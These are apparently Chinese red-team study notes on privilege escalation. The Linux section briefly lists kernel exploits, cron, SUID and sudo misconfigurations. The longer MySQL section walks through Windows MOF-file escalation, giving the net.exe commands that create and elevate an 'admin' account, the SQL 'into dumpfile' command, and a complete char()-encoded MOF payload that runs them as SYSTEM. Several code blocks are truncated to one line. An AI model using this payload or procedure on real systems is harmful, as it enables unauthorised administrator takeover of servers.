提权
提权
一、Linux常见提权
黑白之道—红队测试之Linux提权小结:https://mp.weixin.qq.com/s/BOCQoZLK_IXKXIqzFA4yFA
内核漏洞
定时任务
Suid文件
Sudo 配置错误
NFS共享
第三方服务
1、Linux内核提权漏洞—“脏牛”
1 | 1、小可怜 nc -l 2333 > 获得脚本.py |
2、定时任务
pspy监听进程辅助工具:https://github.com/DominicBreuker/pspy
3、Suid提权
LinEnum.py:https://github.com/rebootuser/LinEnum
二、Mysql提权
1、MOF文件提权
mof是Windows系统的一个文件,位于c:windows\system32\wbem\mofnullevt.mof,叫做托管对象格式, 它的作用是每隔5秒,就会去监控进程的创建和死亡。mof提权的简单利用过程就是,拥有了MySQL的root权限 后,使用root权限去执行上传操作,将我们重新改写过的mof文件上传,之后,这个文件会被服务器每隔5秒 以system权限执行。这个改写的mof中,有一段是vbs脚本,这个vbs大多数是cmd的添加管理员用户的命令
可以提权的根本原因是因为有一个更高权限的线程执行了命令。我们这里nullevt.mof文件的加载过程由system 用户执行,因此我们可以最高把用户的权限提升到system。
利用条件
- Windows版本<=2003
- c:windowssystem32wbemmof目录可写入
- 数据库允许外连,且已知root账号密码
利用代码
1 | # pragma namespace("\.rootsubscription") |
其中的关键就在于第14行的“net.exe user admin admin /add”,这句是用来创建一个用户名为admin,密码为admin的用户,创建成功后,再将这句命令改为 “net.exe localgroup administrators admin /add”后,再次上传,达到创建admin用户并将其加入administrators组的目的。
利用过程
0x0、拥有网站webshell时
如果已经得到了该网站的webshell,那么可以将nullevt.mof文件上传到c盘的的可写目录xxx,然后执行下面的SQL命令即可
select load_file(‘c:xxxnullevt.mof’) into dumpfile ’c:\\windows\system32\wbem\mofnullevt.mof’;
这里可以看下dumpfile与outfile的区别,对于outfile来说,into outfile会自动添加换行符等操作,适用于文本文件,不适合于代码。因为会产生冗余数据,会导致我们的命令执行 失败。而into dumpfile是将文件以二进制的方式写入,因此这里我们用into dumpfile。
0x1、未拥有网站webshell时
对于没有网站webshell的情况,我们可以采取连接数据库后直接写入的方式,将代码转换为ASCII码后,直接传入。
1 | select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile 'c:windowssystem32wbemmofnullevt.mof'; |